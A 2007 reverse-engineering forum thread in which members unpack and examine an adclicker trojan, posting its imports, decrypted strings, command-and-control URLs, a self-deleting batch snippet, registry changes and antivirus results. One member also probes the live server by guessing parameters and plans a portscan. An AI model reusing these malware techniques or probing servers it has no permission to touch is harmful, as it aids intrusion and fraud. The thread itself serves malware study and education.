Log in

View Full Version : Spyware or what ?


seven
January 14th, 2007, 20:19
Hi all , I Found this proggy in TEMP FOLDER

deleted more than 1000 timez returned again

iz it a spyware or trojan or virus or what ?

blurcode
January 14th, 2007, 20:23
All three together?

esther
January 14th, 2007, 21:59
Please delete the attachment.Yes it is 3 in 1.

you might need to boot in safe mode and get rid of it

Kayaker
January 15th, 2007, 01:05
Yep, Mcafee calls this Generic AdClicker.b Trojan. So, should we delete the attachment, or is this a reversing forum? What about using this as a real-life miniproject target?

Sure, cracking shareware is instructional and builds up a reversers skills. Doing crackmes is a pleasant pastime. Neither of these have much "danger" factor to them.

What if you want to get into the AV/anti malware field, where companies are actually begging for qualified people who have the expertise to handle the "hot" targets such as this one. You got the skillz to deal with such a beast as this one? Got a VM set up? How's your outgoing firewall? Can you analyze it without inadvertantly destroying your system?

Maybe as a group project those with more experience can guide those with less who might be a bit hesitant to work with such a file.

Wanna try?

blabberer
January 15th, 2007, 04:14
malwares are fun to play with

this looks like it uses gdi to write text to where ever it is going to write

ok when dealing with malwares one doesnt start out debugging it one atleast would have a cursory glance statically before proceeding to load it in debugger else some clever little tricks may simply trick you into falling for the baits

those who prefer to use thier favourite hexeditor or lordpe or whatever are free to use them

ill use ollydbg only

let go

unzip the attachment (use a virtual machine to follow dont use your production machine to follow unless you are absolutely sure you can deal with consequnces successfully )

start ollydbg
view -> file --> load the 12345678.exe

go to offset 0
right click ->special --> pe header

what do you notice (if you are familiar already with pe header formats it doesnt look like a normal pe header so you can be sure that this is not a normal binary it could be packed crypted obfuscated whatever

so no point loading it directly in a debugger lets poke around a little bit more
lets find the entry point and see if we could deciper some more things before taking the plunge

ok we see te section headers we see its virtual address is 24000 at pointer to raw size is 200 and address of entry point is 27462

so its located pysically at
27462 - 24000 + 200 lets do ctrl+g

and type in 3662

we pore over the diassembly and all we see are few calls and short jumps within viewable distances only one jump in there that sticks out like a sore thumb
can you identify it and tell why it could be usefull enough
from the jump can you really identify the oep ?? just with basic information and the opcodes ??

and can you follow your gut instinct and prove your hypothesis is rigth ?

you havent yet loaded it in debugger or a real disassembler that would make your life little easier but you can still be about 99.9% sure about the oep you would decipher at this stage

ill post my hypothesis later
any one else ???



some of the imports it resolves and some strings generated after unpacking are like this what do you find if you hunt down information on the urls ?

Code:

77D40000 Module C:\WINDOWS\system32\user32.dll
0042750B COND: ReleaseDC
0042750B COND: GlobalFree
0042750B COND: GlobalLock
0042750B COND: GlobalUnlock
0042750B COND: LocalAlloc
0042750B COND: LocalFree
0042750B COND: MultiByteToWideChar
0042750B COND: ReadFile
0042750B COND: SetEndOfFile
0042750B COND: SetFilePointer
0042750B COND: Sleep
0042750B COND: WideCharToMultiByte
0042750B COND: WinExec
0042750B COND: WriteFile
0042750B COND: lstrcatA
0042750B COND: lstrcmpA
0042750B COND: lstrcmpiA
0042750B COND: lstrcpyA
0042750B COND: lstrcpynA
0042750B COND: lstrlenA
0042750B COND: GlobalAlloc
0042750B COND: GetVersionExA
0042750B COND: GetTickCount
0042750B COND: GetTempPathA
0042750B COND: GetSystemDirectoryA
0042750B COND: GetModuleFileNameA
0042750B COND: GetCurrentProcess
0042750B COND: CloseHandle
0042750B COND: HeapFree
0042750B COND: HeapAlloc
0042750B COND: GetProcessHeap
0042750B COND: GetFileSize
0042750B COND: CopyFileA
0042750B COND: CreateFileA
0042750B COND: DeleteFileA
0042750B COND: ExitProcess
77F10000 Module C:\WINDOWS\system32\GDI32.dll
77DD0000 Module C:\WINDOWS\system32\advapi32.dll
0042750B COND: OpenProcessToken
0042750B COND: LookupPrivilegeValueA
0042750B COND: RegCloseKey
0042750B COND: RegOpenKeyExA
0042750B COND: RegSetValueExA
0042750B COND: AdjustTokenPrivileges
77E70000 Module C:\WINDOWS\system32\RPCRT4.dll
771B0000 Module C:\WINDOWS\system32\wininet.dll
77C10000 Module C:\WINDOWS\system32\msvcrt.dll
77F60000 Module C:\WINDOWS\system32\SHLWAPI.dll
77A80000 Module C:\WINDOWS\system32\CRYPT32.dll
77B20000 Module C:\WINDOWS\system32\MSASN1.dll
77120000 Module C:\WINDOWS\system32\OLEAUT32.dll
774E0000 Module C:\WINDOWS\system32\ole32.dll
773D0000 Module C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
0042750B COND: InternetCloseHandle
0042750B COND: HttpSendRequestA
0042750B COND: HttpOpenRequestA
0042750B COND: FindNextUrlCacheEntryA
0042750B COND: FindFirstUrlCacheEntryA
0042750B COND: DeleteUrlCacheEntryA
0042750B COND: InternetConnectA
77260000 Module C:\WINDOWS\system32\urlmon.dll
0042750B COND: URLDownloadToFileA
77C00000 Module C:\WINDOWS\system32\VERSION.dll
7C9C0000 Module C:\WINDOWS\system32\shell32.dll
0042750B COND: ShellExecuteA
0042750B COND: GetTextExtentPoint32A
0042750B COND: GetObjectA
0042750B COND: DeleteObject
0042750B COND: PatBlt
0042750B COND: CreateFontA
0042750B COND: CreateCompatibleDC
0042750B COND: CreateCompatibleBitmap
0042750B COND: SelectObject
0042750B COND: StretchBlt
0042750B COND: TextOutA
0042750B COND: CreateDIBitmap
0042750B COND: CreateDIBSection
0042750B COND: DeleteDC
0042750B COND: OleInitialize
0042750B COND: OleUninitialize
0042750B COND: CoCreateInstance
0042750B COND: VariantInit
0042750B COND: SysFreeString
0042750B COND: SysAllocString

Text strings referenced in 47547792:
Address Disassembly Text string
00401000 PUSH EBP (Initial CPU selection)
0040121F PUSH 47547792.00408C3D ASCII "complete"
0040125F PUSH 47547792.00408C48 ASCII "interactive"
0040127C PUSH 47547792.00408C54 ASCII "HL_"
00401281 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
0040128D PUSH 47547792.00408C58 ASCII "HD_"
00401292 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004012A9 PUSH 47547792.00408C5C ASCII "DO_"
004012AE PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004012BA PUSH 47547792.00408C60 ASCII "IW_"
004012BF PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004013FC PUSH 47547792.00408C64 ASCII "7search.com/scripts/security/validate.asp"
00401479 PUSH 47547792.00408C94 ASCII "http://66.199.179.8/search.php"
0040148D PUSH 47547792.00408CB4 ASCII "http://65.39.170.123/search.php"
004014B8 PUSH 47547792.00408CD4 ASCII "http://66.250.74.152/click_second"
00401781 PUSH 47547792.00408CFC ASCII "NC2_"
00401786 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004017A6 PUSH 47547792.00408D04 ASCII "NW_"
004017AB PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004017CE PUSH 47547792.0040853E ASCII "winlogon.exe"
004017F0 PUSH 47547792.0040853E ASCII "winlogon.exe"
0040184C PUSH 47547792.0040854B ASCII "%d.%d-"
00401863 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401878 PUSH 47547792.004084EB ASCII "no"
0040187D PUSH 47547792.004084E2 ASCII "PopupMgr"
00401882 PUSH 47547792.00408487 ASCII "Software\Microsoft\Internet Explorer\New Windows"
00401891 PUSH 47547792.004084EB ASCII "no"
00401896 PUSH 47547792.004084F2 ASCII "Display Inline Images"
0040189B PUSH 47547792.004084B8 ASCII "Software\Microsoft\Internet Explorer\Main"
004018AA PUSH 47547792.004084EB ASCII "no"
004018AF PUSH 47547792.00408508 ASCII "Display Inline Videos"
004018B4 PUSH 47547792.004084B8 ASCII "Software\Microsoft\Internet Explorer\Main"
004018DE PUSH 47547792.00408AF1 ASCII "Regsvr32.exe /s shdocvw.dll"
004019B1 PUSH 47547792.00408D08 ASCII "&er["
004019B6 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004019C5 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004019CF PUSH 47547792.00408D10 ASCII "]="
004019D4 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A19 PUSH 47547792.00408D14 ASCII "SW_"
00401A1E PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A4C PUSH 47547792.00408D18 ASCII "RB_"
00401A51 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401A6A PUSH 47547792.00408552 ASCII "ghdfggf6j.tmp"
00401A82 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401D9C PUSH 47547792.00408D1C ASCII "DC_"
00401DA1 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E06 PUSH 47547792.00408D20 ASCII "NL_"
00401E0B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E28 PUSH 47547792.00408D24 ASCII "EC_"
00401E2D PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E40 PUSH 47547792.00408D28 ASCII "NC_"
00401E45 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401E65 PUSH 47547792.00408D2C ASCII "OW_"
00401E6A PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00401EC7 PUSH 47547792.00408D30 ASCII "testovaya hren"
0040200B PUSH 47547792.004085B8 ASCII "Suurch
findnseek
shopzil
www.suurch.com
"
00402078 PUSH 47547792.00408566 ASCII "add to card
checkout
continue shopping
download
submit
click here
cart
"
00402223 PUSH 47547792.00408D40 ASCII "Im_"
00402228 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402284 PUSH 47547792.00408D44 ASCII "Lim_"
00402289 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004022BC PUSH 47547792.00408D4C ASCII "Tc_"
004022C1 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004022D0 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004023C9 PUSH 47547792.00408D50 ASCII "Mc_"
004023CE PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004023F5 PUSH 47547792.00408D54 ASCII "Lp_"
004023FA PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402634 PUSH 47547792.00408D5C ASCII "value=no_spyware"
004026EA PUSH 47547792.00408D70 ASCII "f1"
0040271B PUSH 47547792.00408D74 ASCII "f3"
00402752 PUSH 47547792.00408D78 ASCII "None"
00402765 PUSH 47547792.00408D80 ASCII "none"
0040283E PUSH 47547792.00408D88 ASCII "FC_"
00402843 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004029F7 PUSH 47547792.00408D8C ASCII "Im_"
004029FC PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402A44 PUSH 47547792.00408D90 ASCII "66.250.74.152/kw_img/img_gen.php"
00402BB4 PUSH 47547792.00408DB4 ASCII "Im_"
00402BB9 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402C6D PUSH 47547792.00408DBC ASCII "Tc_"
00402C72 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402C81 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402D78 PUSH 47547792.00408DC0 ASCII "Mc_"
00402D7D PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00402F06 PUSH 47547792.00408DC4 ASCII "fc"
00402F0B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
0040304D PUSH 47547792.00408DC8 ASCII "ac"
00403052 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403176 PUSH 47547792.00408DCC ASCII "rc"
0040317B PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403414 PUSH 47547792.00408DD0 ASCII "BODY_"
00403419 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00403568 PUSH 47547792.00408443 ASCII "grdsfsd.bat"
00403598 PUSH 47547792.0040844F ASCII ":gl234sh
del %1
if exist %1 goto gl234sh
del %0"
004035AB PUSH 47547792.0040844F ASCII ":gl234sh
del %1
if exist %1 goto gl234sh
del %0"
004035C8 ASCII ""%s"",0
004035D2 PUSH 47547792.004035C8 ASCII ""%s""
004035F3 PUSH 47547792.00408482 ASCII "open"
00403759 PUSH 47547792.004085E7 ASCII "\drivers\etc\hosts"
004038DF PUSH 47547792.00408DD8 ASCII "text="
004038F7 PUSH 47547792.00408DE0 ASCII "&url="
00403911 ASCII "Content-Type: ap"
00403921 ASCII "plication/x-www-"
00403931 ASCII "form-urlencoded",0
0040394A PUSH 47547792.00408DE8 ASCII "MyAgent"
0040396B PUSH 47547792.00408428 ASCII "greeng.biz"
00403989 PUSH 47547792.00408437 ASCII "ht/post.php"
0040398E PUSH 47547792.00408DF0 ASCII "POST"
004039B0 PUSH 47547792.00403911 ASCII "Content-Type: application/x-www-form-urlencoded"
00403A4D PUSH 47547792.00408DF8 ASCII "Shell DocObject View"
00403A61 PUSH 47547792.00408E0D ASCII "Internet Explorer_Server"
00403CA5 MOV EDI, 47547792.0040863A ASCII "Arial"
00403D89 PUSH 47547792.00408E26 ASCII "%ld_%ld_%ld"
00403DA4 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004042E2 PUSH 47547792.00408E34 ASCII "%lX.png"
00404473 PUSH 47547792.00408E3C ASCII "RZ_"
00404478 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
004044CE PUSH 47547792.00408E40 ASCII "Arial"
004045BD PUSH 47547792.00408E48 ASCII "%lX.png"
004048EC PUSH 47547792.00408560 ASCII "-%lX-"
00404907 PUSH 47547792.00408000 ASCII "http://greeng.biz:2080/rd/rep.php?er[0]="
00404931 PUSH 47547792.00408ADD ASCII "SeShutdownPrivilege"

00408000 ASCII "http://greeng.bi"
00408010 ASCII "z:2080/rd/rep.ph"
00408020 ASCII "p?er[0]=",0
00408428 ASCII "greeng.biz",0
00408437 ASCII "ht/post.php",0
00408443 ASCII "grdsfsd.bat",0
0040844F ASCII ":gl234sh
del %1"
0040845F ASCII "
if exist %1 go"
0040846F ASCII "to gl234sh
del "
0040847F ASCII "%0",0
00408482 ASCII "open",0
00408487 ASCII "Software\Microso"
00408497 ASCII "ft\Internet Expl"
004084A7 ASCII "orer\New Windows"
004084B7 ASCII 0
004084B8 ASCII "Software\Microso"
004084C8 ASCII "ft\Internet Expl"
004084D8 ASCII "orer\Main",0
004084E2 ASCII "PopupMgr",0
004084EB ASCII "no",0
004084EE ASCII "yes",0
004084F2 ASCII "Display Inline I"
00408502 ASCII "mages",0
00408508 ASCII "Display Inline V"
00408518 ASCII "ideos",0
0040853E ASCII "winlogon.exe",0
0040854B ASCII "%d.%d-",0
00408552 ASCII "ghdfggf6j.tmp",0
00408560 ASCII "-%lX-",0
00408566 ASCII "add to card
che"
00408576 ASCII "ckout
continue "
00408586 ASCII "shopping
downlo"
00408596 ASCII "ad
submit
clic"
004085A6 ASCII "k here
cart
",0
004085B8 ASCII "Suurch
findnsee"
004085C8 ASCII "k
shopzil
www."
004085D8 ASCII "suurch.com
",0
004085E7 ASCII "\drivers\etc\hos"
004085F7 ASCII "ts",0
004085FA ASCII "ABCDEFGHIJKLMNOP"
0040860A ASCII "QRSTUVWXYZabcdef"
0040861A ASCII "ghijklmnopqrstuv"
0040862A ASCII "wxyz0123456789+_"
0040863A ASCII "Arial",0
00408640 ASCII "Century Gothic",0
0040864F ASCII "Haettenschweiler"
0040865F ASCII 0
00408660 ASCII "Times New Roman",0
00408670 ASCII "MS Sans Serif",0
0040867E ASCII "AvantGarde Bk BT"
0040868E ASCII 0
0040868F ASCII "Comic Sans MS",0
0040869D ASCII "Courier New",0
00408ADD ASCII "SeShutdownPrivil"
00408AED ASCII "ege",0
00408AF1 ASCII "Regsvr32.exe /s "
00408B01 ASCII "shdocvw.dll",0
00408C3D ASCII "complete",0
00408C48 ASCII "interactive",0
00408C54 ASCII "HL_",0
00408C58 ASCII "HD_",0
00408C5C ASCII "DO_",0
00408C60 ASCII "IW_",0
00408C83 ASCII "lidate.asp",0
00408C94 ASCII "http://66.199.17"
00408CA4 ASCII "9.8/search.php",0
00408CB4 ASCII "http://65.39.170"
00408CC4 ASCII ".123/search.php",0
00408CD4 ASCII "http://66.250.74"
00408CE4 ASCII ".152/click_secon"
00408CF4 ASCII "d",0
00408CFC ASCII "NC2_",0
00408D04 ASCII "NW_",0
00408D08 ASCII "&er[",0
00408D10 ASCII "]=",0
00408D14 ASCII "SW_",0
00408D18 ASCII "RB_",0
00408D1C ASCII "DC_",0
00408D20 ASCII "NL_",0
00408D24 ASCII "EC_",0
00408D28 ASCII "NC_",0
00408D2C ASCII "OW_",0
00408D30 ASCII "testovaya hren",0
00408D40 ASCII "Im_",0
00408D44 ASCII "Lim_",0
00408D4C ASCII "Tc_",0
00408D50 ASCII "Mc_",0
00408D54 ASCII "Lp_",0
00408D5C ASCII "value=no_spyware"
00408D6C ASCII 0
00408D70 ASCII "f1",0
00408D74 ASCII "f3",0
00408D78 ASCII "None",0
00408D80 ASCII "none",0
00408D88 ASCII "FC_",0
00408D8C ASCII "Im_",0
00408D90 ASCII "66.250.74.152/kw"
00408DA0 ASCII "_img/img_gen.php"
00408DB0 ASCII 0
00408DB4 ASCII "Im_",0
00408DBC ASCII "Tc_",0
00408DC0 ASCII "Mc_",0
00408DC4 ASCII "fc",0
00408DC8 ASCII "ac",0
00408DCC ASCII "rc",0
00408DD0 ASCII "BODY_",0
00408DD8 ASCII "text=",0
00408DE0 ASCII "&url=",0
00408DE8 ASCII "MyAgent",0
00408DF0 ASCII "POST",0
00408DF8 ASCII "Shell DocObject "
00408E08 ASCII "View",0
00408E0D ASCII "Internet Explore"
00408E1D ASCII "r_Server",0
00408E26 ASCII "%ld_%ld_%ld",0
00408E34 ASCII "%lX.png",0
00408E3C ASCII "RZ_",0
00408E40 ASCII "Arial",0
00408E48 ASCII "%lX.png",0


esther
January 15th, 2007, 04:59
Hi all,

Its packed with fsg v1.33 (ol' peid says)

well after fixing the imports.it still have problems runing

well this "crackme" doe runs in 2k sp4 but does nothing.

Thats all for now

blabberer
January 15th, 2007, 05:46
well it uses queer oleinitialize and cocreateinstance and calls somewhere in rpcrt dlls an in there it sits waitingfor multiple mesages whose mask are

Qs_KEY,QS_MOUSEMOVE,QS_HOTKEY and a few other QS_

so it looks like its doing nothing this file may be a part of a multiple droppers

and is probably looking for some events to happen before it can spew its venom

and it seems many of te antivir out there arent able to definately classify it

plain kaspersky file scanner gave this file a clean chit

Quote:

You're clean!
Scanned file: 475477922.exe



Statistics:
Known viruses: 258503 Updated: 15-01-2007
File size (Kb): 16 Virus bodies: 0
Files: 1 Warnings: 0
Archives: 0 Suspicious: 0



so i went to virus total and it seems none of the results are definitive

Code:


Antivirus Version Update Result
AntiVir 7.3.0.21 01.09.2007 no virus found
Authentium 4.93.8 01.12.2007 Possibly a new variant of W32/Dlr-Trojan-Malware-based!Maximus
Avast 4.7.936.0 01.13.2007 Win32:Agent-BSU
AVG 386 01.15.2007 no virus found
BitDefender 7.2 01.15.2007 Trojan.Downloader.Popmup.A
CAT-QuickHeal 9.00 01.12.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 01.15.2007 Trojan.Clicker-21
DrWeb 4.33 01.15.2007 DLOADER.Trojan
eSafe 7.0.14.0 01.15.2007 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.113 01.13.2007 no virus found
eTrust-Vet 30.3.3329 01.15.2007 no virus found
Ewido 4.0 01.14.2007 no virus found
Fortinet 2.82.0.0 01.13.2007 suspicious
F-Prot 3.16f 01.12.2007 Possibly a new variant of W32/Dlr-Trojan-Malware-based!Maximus
F-Prot4 4.2.1.29 01.12.2007 W32/Dlr-Trojan-Malware-based!Maximus
Ikarus T3.1.0.27 01.09.2007 no virus found
Kaspersky 4.0.2.24 01.15.2007 no virus found
McAfee 4938 01.12.2007 Generic AdClicker.b
Microsoft 1.1904 01.15.2007 no virus found
NOD32v2 1980 01.15.2007 a variant of Win32/TrojanDownloader.Small.CYF
Norman 5.80.02 01.15.2007 no virus found
Panda 9.0.0.4 01.14.2007 Suspicious file
Prevx1 V2 01.15.2007 no virus found
Sophos 4.13.0 01.13.2007 Mal/Packer
Sunbelt 2.2.907.0 01.12.2007 VIPRE.Suspicious
TheHacker 6.0.3.148 01.14.2007 no virus found
UNA 1.83 01.12.2007 no virus found
VBA32 3.11.2 01.15.2007 no virus found
VirusBuster 4.3.19:9 01.15.2007 novirus:Packed/FSG


Aditional Information
File size: 16224 bytes
MD5: 649ef54499d2c97a7ff975a1e51288e0
SHA1: 0a66df3e99e4985a26744cb348c2b5da38f12af9
packers: FSG
packers: FSG
packers: FSG
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.


so it might really be a good target to practice with collectively

anyone up to the task with good com interface calls expertise could jump in and create fun analysing it (especially explaining wat interface its calling whats the clsctx (clascontext looks like its using CLASSCTX_IN_PROC_SERVER CLSCTX_LOCAL_SERVER)

thats all for now got work to do

ps ( btw esther did you check browsing a few forums after it apparantly did not run in your computer ?? are you able to see images still ?? ) i believe it would have successfully set
hkcu/software/m$/ie/main/--> display inline images to no

seven
January 15th, 2007, 08:43
Quote:
All three together

Quote:
you might need to boot in safe mode and get rid of it

i did that but no hope beside i start to love this trojan
Quote:
kaspersky file scanner gave this file a clean chit

antivirus cant discover (trojan + virus) when packed coz packing
hide everything . i know coz i dealed with both 4 long time .
Quote:
What about using this as a real-life miniproject target?

Kayaker : dont turn my trojan to one of ur projectz coz itz illegal

naides
January 15th, 2007, 09:42
Seven: If all you want is to get rid of the trojan, which I suspect was your only request,
Search around for tools like "kill it" over the net. They are able to remove very clingy parasites, or read the manual removal instructions in one of the Anti-virus serious sites.

ZaiRoN
January 15th, 2007, 11:35
Nice project definitly!

I had a glance at it and seems to be easy to understand what it does so it's a perfect program for curious newbies :-)
I would start with your questions and after that we can proceed with the analysis of the file answering and clearing all the doubts which may arise working on a malware in general. What do you all think?

Silkut
January 15th, 2007, 14:55
From a curious newbie point of view I find it very exciting and interesting, I hopefully got several VMs (a particular one that is 'totally' separated from the host: ideal for malwares ?). I read every post with attention.
_learn the good reflexs
_increase rce analysis performances
_particularities of malware analysis
_use alcohol as stimulant
..

esther
January 16th, 2007, 00:59
hi blabberer,

*ps ( btw esther did you check browsing a few forums after it apparantly did not run in your computer ?? are you able to see images still ?? ) i believe it would have successfully set
hkcu/software/m$/ie/main/--> display inline images to no

oh well I'm on windows 2000 sp4,no vmware.

During running that "47..." it stays in the process
It does all sorts of reading and query,you can see it filemon.
then

'47.....EXE' from your computer wants to connect to 194.230.36.72.reverse.layeredtech.com [72.36.230.194], port 2080

The "47...." auto deletes after that hmmm
well I stopped there coz its not a test machine

I checked my IE loading the forum and yes the pictures ,icons were disabled.

Well you can reset it back on advanced options in IE.

Have fun

blabberer
January 16th, 2007, 13:42
@esther
yeah you can reset it
my question was just to confirm your statement that it does not run

i was just baiting for question to be asked and bait some curious bystander to actually download disassemble and put forward a few more queries
but questions havent yet started pouring in

edit

just noticed that post number is devils favourite number

am i being devils advocate

SiGiNT
January 16th, 2007, 17:44
Well it seems it may be a wanna be browser hijacker, out of curiousity and total disregard for my computer here, I plugged "72.36.230.194 port 2080" into IE7 as a proxy and when restarted it took me directly to a page called funfun.name - source listed below:


<html>
<head>
<title>
funfun.name
</title>

<style>
* { font-family: verdana; font-size: 10pt; COLOR: gray; }
b { font-weight: bold; }
table { height: 50%; border: 1px solid gray;}
td { text-align: center; padding: 25;}

</style>
</head>
<body>
<center>
<br><br><br><br>
<table>
<tr><td>Welcome to the home of <b>funfun.name</b></td></tr>
<tr><td>To change this page, upload your website into the public_html directory</td></tr>
<tr><td><img src="logo.jpg"></td></tr>
<table>

</center>
</body>

</html>

SiGiNT

esther
January 16th, 2007, 23:21
hi blabberer,

I have a language barrier here

*my question was just to confirm your statement that it does not run

It excutes and it runs

update:
It seems its a modified fsg.I'm a newbie in this so anyone would want to confirm about that?

LLXX
January 17th, 2007, 00:25
Did a WHOIS on that IP.
Quote:
Name: Suo-Anttila, Jeremy Paul
Handle: JPS66-ARIN
Company: Layered Technologies
Address: 18816 Preston Road
Address: Suite #100
City: Dallas
StateProv: TX
PostalCode: 75252
Country: US
Hmm... webhost?

Also noticed something interesting:
Quote:
http://66.250.74.152/kw_img/img_gen.php
Hit it with the browser...
Quote:
GET /kw_img/img_gen.php HTTP/1.0
Accept: */*
Accept-Language: en-us,zh;q=0.8,zh-cn;q=0.5,zh;q=0.3
Pragma: no-cache
User-Agent: Mozilla/4.00 (compatible; NetView/1.02; PN-DOS v8.94; MGnX v5.11)
Host: 66.250.74.152
Connection: keep-alive
Accept-encoding: gzip, deflate
======================
HTTP/1.1 200 OK
Date: Wed, 17 Jan 2007 05:13:45 GMT
Server: Apache/*.*.** (Unix) PHP/4.3.8
X-Powered-By: PHP/4.3.8
X-Accelerated-By: PHPA/1.3.3r2
Connection: close
Transfer-Encoding: chunked
Content-Type: image/png
And returns a PNG with some blurry text on it that seems to say "Error: No sid provid"

Using Fravia's art of Guessing, I try

http://66.250.74.152/kw_img/img_gen.php?sid=0123456879

...and get "Error: No pid provid". I'm onto something.

http://66.250.74.152/kw_img/img_gen.php?sid=0123456879&pid=0123456789

Ok, "Error: No string provid".

http://66.250.74.152/kw_img/img_gen.php?sid=0123456879&pid=0123456789&string=0123546789

No luck. Tried s, str, text, also with no luck. Googling the filename and the parameter names also produces no results. Backing up a directory we see img_gen.php and arial.ttf. This is some sort of image generator. Going up to the root produces the single line "hello".

I'm probably getting into security/hacking now, but I'll portscan this target later to see what we can gather.

This is fun.

blabberer
January 17th, 2007, 02:37
@ esther i believe you really dont have any language barriers
but is too much fond of your signature
thats some kind of conviction you hold
truly i dont give a damn to what kind of packer it is as i never go for premade tools ( i mean unpackers ,oep finders , protection identifiers and thier ilk)

i tend to muddle my way all through myself

yeah your guess could be right if it was real fsg then possibly the fsg string has been erased
and if you notice while unpacking it you will see a homebrewed
import string decryptor (although its lame just changed the first charecter of every import name so it will take GxitProcess
and convert it to ExitProcess before getting the ProcAddress via Loadlib() GetProcAddress() (i dont think real fsg did all those trickery also if i remeber well fsg didnt have that kind of jump to oep in its original version and didnt check for some hardcoded const in its way over over there)


well like mcafee said its an adclicker that means it fetches or redirects your queries and clicks on the advertisements in those sites which would fetch the the zombies revenue on those murky pay per click sites

@LLXX
get into the binary a little you will see what string is appended to the url (its decrypted and appended with lstrcat()

or try a detour on lstrcat down deep below and log them and
run wget on those urls

if you notice my strings output you will see the urls with lot of = including the img_gen url in clear

a sample output before decryption
Code:

""""18iuuq;..bnmns/bhjmnq/hogn.bij/qiq>pp<n*rnmd*lhn"18iuuq;..wnoq`hou/bnqhshfiu/nsf.bij/qiq>pp<ctx*c`cx*bshc"12iuuq;..tobk/rdoeunch{/hogn.rd`sbi/qiq>p<f`sedohof*fhgu*rqdbh`m"14iuuq;..gdde/kduihmmr/nsf.bij/qiq>pp<odv*{d`m`oe*fhgu"19iuuq;..uidsd`mm/sd`mqshou/hogn.ylmrd`sbi/qiq>j<bmnrhof*uid*`bihdwdldou*f`q"10iuuq;..knjd/vhohofr/o`ld.ylmrd`sbi/qiq>j<b`mhgnsoh`*u`y*qsdq`sds*cnoe"19iuuq;..ushq3/unxq`sur/hogn.ylmrd`sbi/qiq>j<knc*otsrd*rddjds"14iuuq;..cl/rdoeunch{/hogn.bij/qiq>pp<fbd*m*n*sdrtmu"15iuuq;..31758/rdoeunch{/hogn.ylmrd`sbi/qiq>j<bmnrhof*uid*f`q"


after decryption

Code:

0042289B ####09http://color.ciklop.info/chk.php?qq=o+sole+mio#09http://vo
004228DB npaint.copiright.org/chk.php?qq=buy+baby+crib#03http://uncj.send
0042291B tobiz.info/search.php?q=gardening+gift+special#05http://feed.jet
0042295B hills.org/chk.php?qq=new+zealand+gift#08http://thereall.realprin
0042299B t.info/xmlsearch.php?k=closing+the+achievement+gap#01http://joke
004229DB .winings.name/xmlsearch.php?k=california+tax+preparer+bond#08htt
00422A1B p://trip2.toyparts.info/xmlsearch.php?k=job+nurse+seeker#05http:
00422A5B //bm.sendtobiz.info/chk.php?qq=gce+l+o+result#04http://20649.sen
00422A9B dtobiz.info/xmlsearch.php?k=closing+the+gap#


also just by looking at input and output i think you can guess the algorithm used

Silkut
January 17th, 2007, 10:35
Caesar rotation with one move to the right, ROT1 :-?

blabberer
January 17th, 2007, 12:18
@silkut
test your hypothesis here
it will have an online decoder for all the cipheres

http://www.antilles.k12.vi.us/math/cryptotut/home.htm

Silkut
January 17th, 2007, 12:50
@blabberer: thanks for the link.

owl
January 19th, 2007, 10:29
Most malware will create a separate process that will be start automatically everytime that you reboot your system. This process will check to see if it is already install, if not it will re-install itself. That is why it keeps comming back everytime you remove it. If you knew the process name, you can just go to the services file, and change it from automatic start to manual start or just delete that file.

